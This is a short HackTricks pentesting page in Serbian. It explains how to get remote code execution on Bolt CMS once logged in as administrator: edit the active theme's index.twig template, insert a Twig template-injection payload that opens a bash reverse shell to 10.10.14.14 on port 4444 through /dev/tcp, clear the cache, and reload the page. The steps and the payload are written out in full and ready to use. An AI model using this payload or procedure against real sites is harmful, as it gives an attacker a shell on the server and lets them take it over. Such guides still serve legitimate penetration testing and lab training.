hacktricks/network-services-pentesting/pentesting-web/bolt-cms.md

3.3 KiB

Bolt CMS

{% hint style="success" %} Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Podržite HackTricks
{% endhint %}

RCE

Nakon prijave kao admin (idite na /bot da pristupite login promptu), možete dobiti RCE u Bolt CMS:

  • Izaberite Configuration -> View Configuration -> Main Configuration ili idite na URL putanju /bolt/file-edit/config?file=/bolt/config.yaml
  • Proverite vrednost teme
  • Izaberite File management -> View & edit templates
  • Izaberite osnovnu temu pronađenu u prethodnom (base-2021 u ovom slučaju) koraku i izaberite index.twig
  • U mom slučaju ovo je u URL putanji /bolt/file-edit/themes?file=/base-2021/index.twig
  • Postavite svoj payload u ovu datoteku putem template injection (Twig), kao: {{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}
  • I sačuvajte promene
  • Očistite keš u Maintenance -> Clear the cache
  • Ponovo pristupite stranici kao običan korisnik, i payload bi trebao biti izvršen

{% hint style="success" %} Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Podržite HackTricks
{% endhint %}